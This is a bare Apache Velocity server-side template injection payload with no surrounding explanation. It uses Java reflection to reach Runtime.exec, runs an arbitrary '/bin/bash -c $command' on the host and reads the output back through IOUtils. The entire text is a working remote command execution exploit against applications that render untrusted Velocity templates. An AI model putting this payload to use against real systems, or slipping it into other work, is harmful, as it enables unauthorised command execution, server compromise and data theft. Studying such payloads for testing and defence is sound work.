#set($e="e")
$e.getClass().forName("org.apache.commons.io.IOUtils").getMethod("toString",$e.getClass().forName("java.io.InputStream")).invoke(null,$e.getClass().forName("java.lang.Runtime").getMethod("getRuntime",null).invoke(null,null).exec("/bin/bash -c $command").getInputStream());